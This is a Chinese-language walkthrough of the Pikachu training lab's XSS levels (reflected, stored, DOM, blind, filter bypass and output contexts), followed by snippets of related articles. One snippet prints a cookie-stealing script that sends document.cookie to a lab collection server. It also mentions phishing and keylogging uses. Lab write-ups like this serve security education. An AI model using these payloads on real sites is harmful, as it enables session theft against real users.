pikachu xss'

反射性xss(get)

输入“ ‘"<>123456 ” 用于测试我们的输入会不会被过滤掉,因为有特殊字符 查看页面源码 输入被输出到了 p 标签中

测试输入的JS代码payload如下

前端对输入长度做了限制,修改一下成为2333333    才能输入完整的payload

成功执行 查看源码,输入的payload嵌入了到了 p 标签里面

反射性xss(post)

用户名密码 admin 123456  进入界面

不能输入标签中

POST的方式提交的,参数内容不会出现在URL中,通过burpsuite

账号admin/123456
登上去以后发现还是没有任何过滤,直接构造payload:

 

经查询发现是用sha1 解密 得出密码为123456

存储型XSS

存储型XSS和反射型XSS形成的原因是一样的,不同的是存储型XSS下攻击者的可以将脚本注入到后台存储起来,构成更加持久的危害

进行特殊字符的测试

发现没有过滤 下面通过源码观察,也直接输出在 p 标签中,看起来没有经过任何转义和处理 下面输入下面的Payload进行测试测试输入的JS代码payload如下

成功弹窗

返回目录

DOM型XSS

随意输入字符123

输入的语句全部嵌在a标签内了

创造一个闭合,将a标签闭合掉,并且写入一个语句。

构造payload

成功弹窗

DOM型XSS-X

输入是从浏览器的URL中获取的,和反射型XSS(get)类似

构造payload

构造payload

成功弹窗

XSS盲打

提交后内容不再前端输出 而是输入到了后台。

提交以下内容

登录后台管理界面  http:///pikachu/vul/xss/xssblind/admin_login.php

一进来就发现弹窗

xss 过滤

开发者会做出很多防御措施,但是还是有很多绕过的方式。比如大小写,双写(拼凑)注释干扰,

大小写混合的方式看看能否绕过

成功弹窗,后端只对小写的script进行过滤

将alert(‘xss‘)进行HTML编码 成功弹窗

XSS htmlspecialchars

发现单引号没有经过编码

输入特殊字符进行测试

添加一个单引号用于闭合 href 中的单引号

XSS href输出

输入一个进行测试 提交后查看源码,输入在 a 标签的 href属性中

点击出现弹窗

XSSjs输出

随便输入进行测试

测试输入查看页面源码 插入js 测试代码

构造一个闭合,先用一个单引号和</script>闭合掉页面中的<script> 构建payload

js代码执行 成功弹出弹窗

pikachu xss'

原文地址:https://www.cnblogs.com/p201721210007/p/12034842.html

时间: 2024-11-02 23:48:23

pikachu xss'的相关文章

pikachu XSS后台的使用和安装

xss后台的安装 重定向到另一个可信网址  让点击者 不知情  1.cookie值获取 查看源代码 在反射型xss(get)页面下使用 <script> document.location = 'http://192.168.50.100/pkxss/xcookie/cookie.php?cookie='   +  document.cookie; </script>   点提交,会跳转到首页, http://192.168.50.100/pikachu/vul/xss/xss_r

Pikachu漏洞练习平台实验——XSS(二)

概述 反射型XSS(get) XSS案例:盗取Cookie 反射型XSS(post) 存储型XSS XSS案例:钓鱼攻击 XSS案例:键盘记录 DOM型XSS DOM型XSS-X XSS之盲打 XSS之过滤 XSS之htmlspecialchars XSS常见防范措施 XSS之href输出 XSS之js输出 概述 简介 XSS是一种发生在Web前端的漏洞,所以其危害的对象也主要是前端用户 XSS漏洞可以用来进行钓鱼攻击.前端js挖矿.盗取用户cookie,甚至对主机进行远程控制 攻击流程 假设存

Pikachu漏洞平台---XSS(Cross-Site Scripting) 跨站脚本

XSS(跨站脚本)概述    Cross-Site Scripting 简称为“CSS”,为避免与前端叠成样式表的缩写"CSS"冲突,故又称XSS.一般XSS可以分为如下几种常见类型:        1.反射性XSS;        2.存储型XSS;        3.DOM型XSS; 危害: 存储型>反射型>DOM型 1.反射型XSS(get) 随便输入,  输入   '  "  <>  特殊字符都可以原封不动得输出      可以发现没有任何过滤

pikachu练习平台(XSS-漏洞测试案例(cookie的窃取和利用、钓鱼攻击、XSS获取键盘记录))

XSS-漏洞测试案例 xss案例 1.cookie的窃取和利用 2.钓鱼攻击 3.XSS获取键盘记录 在进行案例之前首先要搭建xss后台 搭建xss后台 1.在pikachu文件夹下面,把pkxss单独放在www下面: 2.修改配置文件  数据库服务器地址,账号,密码: 3.登录: 4.安装: 5.修改,重定向到一个可信的网站(令点击者不知情): 后台登陆成功: 一. get型xss cookie值获取 首先修改字符输入长度: 输入框输入 <script>document.location='

pikachu平台练习(XSS模块)

XSS简介 Cross-Site Scripting 简称为“CSS”,为避免与前端叠成样式表的缩写"CSS"冲突,故又称XSS.一般XSS可以分为如下几种常见类型: 1.反射型XSS; 2.存储型XSS; 3.DOM型XSS; 1.反射型xss(get传参) 打开pikachu对应的这一关,我们发现只有一个输入框,我们随便输入一些字符 ' " <> 等看看是否存在转义, 回显结果显示,对我们输入的字符全部正确的回显了出来,可以确定的确存在xss漏洞,然后我们查看

XSS跨站脚本(pikachu)——反射型xss(get和post)

XSS漏洞是危害比较大的一个漏洞了,主要危害的是前端用户.XSS漏洞可以用来进行钓鱼攻击,前端JS挖矿,用户cookie获取.甚至可以结合浏览器自身的漏洞对用户主机进行远程控制. 这是我从B站学习视频上截取到的攻击过程的图片觉得比较生动形象.  我们需要了解XSS的三种基本类型 反射型XSS:<非持久化> 攻击者事先制作好攻击链接, 需要欺骗用户自己去点击链接才能触发XSS代码(服务器中没有这样的页面和内容),一次性,所见即所得,一般容易出现在搜索页面. 存储型XSS:<持久化>

pikachu学习——XSS漏洞3种基本类型

XSS漏洞是一种发生在Web前端危害较大的漏洞,其危害对象主要是前端用户,此漏洞可以用来进行钓鱼攻击,前端js挖矿,用户cookie获取,甚至结合浏览器对用户主机进行远程控制等. XSS漏洞常见类型有3种,分别是反射型,储存型和DOM型,危害性:储存型>反射型>DOM型. 反射型:交互数据一般不会储存在数据库里面,一次性,所见即所得,一般出现在查询页面等 储存型:交互的数据会被储存在数据库里面,永久性储存,一般出现在留言板,注册等页面 DOM型:不与后台的服务器产生数据交互,是一种通过DOM前

XSS盲打测试(pikachu)

XSS盲打 1.在提交框随意输入一段内容,可以发现并没有在前端进行输出,我们根据提示(pikachu平台每关所给的提示真的超级重要的)登陆一下pikachu的后台. 2.输入一段js代码看一下后台的情况.我们输入的js代码已经被后台成功执行了.盲打和存储型有些相似危害还是很大的,如果后台执行过滤不严的话还是很容易被一些不怀好意的人钻空子的,之所以说是盲打是因为我们并不知道后端是什么样子的,只能尝试,万一成功了呢? 原文地址:https://www.cnblogs.com/fairyting/p/

pikachu的xss攻击

一.反射型xss(get) 1.  我们先输入“ '"<>6666 ” 用于测试我们的输入会不会被过滤掉,因为有特殊字符 2.输入一下<script>alert("xss")</script>,看是否被过滤,但是前端对长度有限制,修改后提交 执行成功 二.反射型xss(post) 1.我们登录一下,默认账号密码是admin 123456 这里是以POST的方式提交的,参数内容不会出现在URL中 这时候我们不能直接把我们的恶意代码嵌入到URL